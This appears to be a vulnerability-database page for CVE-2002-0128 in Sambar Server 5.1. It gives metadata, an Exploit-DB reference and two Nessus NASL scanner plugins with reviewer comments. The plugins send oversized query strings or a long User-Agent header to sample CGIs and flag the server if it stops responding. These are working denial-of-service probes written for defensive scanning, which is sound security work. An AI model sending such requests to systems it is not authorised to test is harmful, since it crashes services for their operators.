Vulnerabilities > CVE-2002-0128 - Unspecified vulnerability in Sambar Server 5.1
Attack vector: UNKNOWN
Attack complexity: UNKNOWN
Privileges required: UNKNOWN
Confidentiality impact: UNKNOWN
Integrity impact: UNKNOWN
Availability impact: UNKNOWN
Summary
cgitest.exe in Sambar Server 5.1 before Beta 4 allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long argument.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 1 |
Exploit-Db
description | Sambar Server 5.1 Sample Script Denial Of Service Vulnerability. CVE-2002-0128. Dos exploit for windows platform |
id | EDB-ID:21228 |
last seen | 2016-02-02 |
modified | 2002-02-06 |
published | 2002-02-06 |
reporter | Tamer Sahin |
source | https://www.exploit-db.com/download/21228/ |
title | Sambar Server 5.1 - Sample Script Denial of Service Vulnerability |
Nessus
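# Aggregator record for this plugin (page metadata, not part of the NASL source):
#   NASL family: CGI abuses
#   NASL id:     SAMBAR_DOS.NASL
#   description: It is possible to kill the Sambar web server
#   last seen:   2020-06-01
#   modified:    2020-06-02
#   plugin id:   11131
#   published:   2002-09-21
#   reporter:    This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
#   source:      https://www.tenable.com/plugins/nessus/11131
#   title:       Sambar Server Multiple CGI Remote Overflow
#
# Purpose: availability check for CVE-2002-0128. It requests the Sambar sample
# CGIs with an oversized query string and reports a finding only if the web
# server no longer answers afterwards.

#
# (C) Tenable Network Security, Inc.
#
# References:
# From: "Tamer Sahin" <[email protected]>
# To: [email protected]
# Subject: Sambar Webserver v5.1 DoS Vulnerability
# Date: Wed, 16 Jan 2002 01:57:17 +0200
# Affiliation: http://www.securityoffice.net
#
# Vulnerables:
# Sambar WebServer v5.1
# NB: this version of Sambar is also vulnerable to a too long HTTP field.
#

include("compat.inc");

if(description)
{
 script_id(11131);
 script_version ("1.25");
 script_cve_id("CVE-2002-0128");
 script_bugtraq_id(3885);

 script_name(english:"Sambar Server Multiple CGI Remote Overflow");

 script_set_attribute(attribute:"synopsis", value: "The remote web server is vulnerable to a denial of service." );
 script_set_attribute(attribute:"description", value: "It is possible to kill the Sambar web server 'server.exe' by sending it a long request like: /cgi-win/testcgi.exe?XXXX...X /cgi-win/cgitest.exe?XXXX...X /cgi-win/Pbcgi.exe?XXXXX...X (or maybe in /cgi-bin/) An attacker may use this flaw to cause the server to crash continuously." );
 script_set_attribute(attribute:"solution", value: "Upgrade the server to Sambar 51p or delete those CGI." );

 # NOTE(review): this base vector scores availability impact only (A:P), while
 # the CVE summary also mentions possible code execution. Confirm which rating
 # your reporting should follow.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2002/09/21");
 script_set_attribute(attribute:"vuln_publication_date", value: "2002/01/16");
 script_cvs_date("Date: 2018/07/27 18:38:14");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_summary(english:"Crashes Sambar web server");

 # ACT_DENIAL: the check works by trying to take the service down. Nessus does
 # not run plugins of this category when safe checks are enabled.
 script_category(ACT_DENIAL);

 script_copyright("This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencies("find_service1.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);

 # Skip the plugin when the scan policy has switched CGI scanning off; every
 # request made below targets a CGI path.
 script_exclude_keys("Settings/disable_cgi_scanning");

 # Both knowledge-base keys must be present for the plugin to be scheduled.
 # presumably "www/sambar" is set by an earlier fingerprinting plugin (verify).
 script_require_keys("www/sambar", "Settings/ParanoidReport");
 exit(0);
}

# The script code starts here

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# The advisories are not clear: is this cgitest.exe or testcgi.exe?
# Is it in cgi-bin or cgi-win?
dir[0] = "";		# Keep it here or change code below
dir[1] = "/cgi-bin/";
dir[2] = "/cgi-win/";
fil[0] = "cgitest.exe";
fil[1] = "testcgi.exe";
fil[2] = "Pbcgi.exe";

port = get_http_port(default:80);

# Only continue against a server whose banner identifies itself as Sambar.
banner = get_http_banner(port: port);
if (! banner || ! egrep(string: banner, pattern: "^Server:.*SAMBAR")) exit(0);

# A server that is already down would produce a false finding at the end.
if (http_is_dead(port:port)) exit(0);

# TBD: request each URL a few times...

# Requests `cgi` on `port` with a 4096-character query string built by crap().
# Returns 1 when no response came back, 0 otherwise.
function test_port(port, cgi)
{
 local_var r;

 r = http_send_recv3(method: "GET", port: port, item: strcat(cgi, "?", crap(4096)));
 if (isnull(r)) return 1;
 return(0);
}

# Try every sample CGI name under both candidate directories.
for (c=0; c<3; c=c+1)
{
 # WARNING! Next loop start at 1, not 0 !
 # dir[0] (the empty prefix) is deliberately not probed.
 for (d=1; d<3; d=d+1)
 {
  # A missing response ends the probing of this file name only; the outer
  # loop still moves on to the next file name.
  if (test_port(port: port, cgi: string(dir[d], fil[c]))) break;
 }
}

# Report only when the server is confirmed unreachable after the requests.
if (http_is_dead(port:port, retry: 3)) security_warning(port);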
# Aggregator record for this plugin (page metadata, not part of the NASL source):
#   NASL family: CGI abuses
#   NASL id:     CGITEST.NASL
#   description: The remote host is running a vulnerable version of Sambar Server, a web server and web proxy. There is a remote buffer overflow vulnerability in
#   last seen:   2020-06-01
#   modified:    2020-06-02
#   plugin id:   10040
#   published:   1999-11-18
#   reporter:    This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
#   source:      https://www.tenable.com/plugins/nessus/10040
#   title:       Sambar Server cgitest.exe Remote Overflow
#
# Purpose: locate cgitest.exe in one of the scanner's known CGI directories,
# request it once with a 2600-character User-Agent header, and report a finding
# when that request gets no response.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(10040);
  script_version("1.44");
  script_cvs_date("Date: 2018/11/15 20:50:16");

  script_cve_id("CVE-2002-0128");
  script_bugtraq_id(3885);

  script_name(english:"Sambar Server cgitest.exe Remote Overflow");
  script_summary(english:"Checks for the /cgi-bin/cgitest.exe buffer overrun");

  script_set_attribute(attribute:"synopsis", value: "The web application installed on the remote host has a buffer overflow vulnerability.");
  script_set_attribute(attribute:"description", value: "The remote host is running a vulnerable version of Sambar Server, a web server and web proxy. There is a remote buffer overflow vulnerability in 'cgitest.exe'. 
A remote attacker could use this to crash the web server, or potentially execute arbitrary code.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Jan/188");
  script_set_attribute(attribute:"solution", value:"Remove the affected file from /cgi-bin.");

  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:W/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2002/01/16");
  script_set_attribute(attribute:"plugin_publication_date", value:"1999/11/18");

  # The result is flagged as a potential (unconfirmed) vulnerability.
  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # ACT_DENIAL: a positive result means the probe got no answer from the
  # service. Nessus does not run plugins of this category when safe checks
  # are enabled.
  script_category(ACT_DENIAL);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");

  script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
  # Not scheduled when the scan policy disables CGI scanning.
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("Services/www", 80);
  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Runs only at paranoia level 2 or higher.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_http_port(default:80);

# Bail out early if the server is already unreachable, otherwise the missing
# response below would be misread as a crash.
if (http_is_dead(port: port)) exit(1, "The web server on port "+port+" is dead.");

# Find the first CGI directory that actually serves cgitest.exe.
cgi_uri = NULL;
foreach dir (cgi_dirs())
{
  candidate = string(dir, "/cgitest.exe");
  if (!is_cgi_installed3(item:candidate, port:port, exit_on_fail: 1)) continue;
  cgi_uri = candidate;
  break;
}

if (isnull(cgi_uri)) exit(0, "cgitest.exe was not found on port "+port+".");

# NOTE(review): the oversized value is sent in the User-Agent header, whereas
# the CVE summary describes a long argument. Confirm which overflow this check
# exercises before relying on it for CVE-2002-0128 coverage.
long_ua_header = make_array("User-Agent", crap(2600));
resp = http_send_recv3(method:"GET", item:cgi_uri, port:port, add_headers:long_ua_header, exit_on_fail: 0);

# NOTE(review): any missing response is reported, with no follow-up liveness
# check. A timeout or reset with another cause would look the same, so confirm
# the finding before acting on it.
if (isnull(resp))
{
  security_hole(port);
}
References
- http://www.der-keiler.de/Mailing-Lists/securityfocus/bugtraq/2002-02/0083.html
- http://www.der-keiler.de/Mailing-Lists/securityfocus/bugtraq/2002-02/0083.html
- http://www.iss.net/security_center/static/7894.php
- http://www.iss.net/security_center/static/7894.php
- http://www.sambar.com/security.htm
- http://www.sambar.com/security.htm
- http://www.securityfocus.com/archive/1/250545
- http://www.securityfocus.com/archive/1/250545
- http://www.securityfocus.com/bid/3885
- http://www.securityfocus.com/bid/3885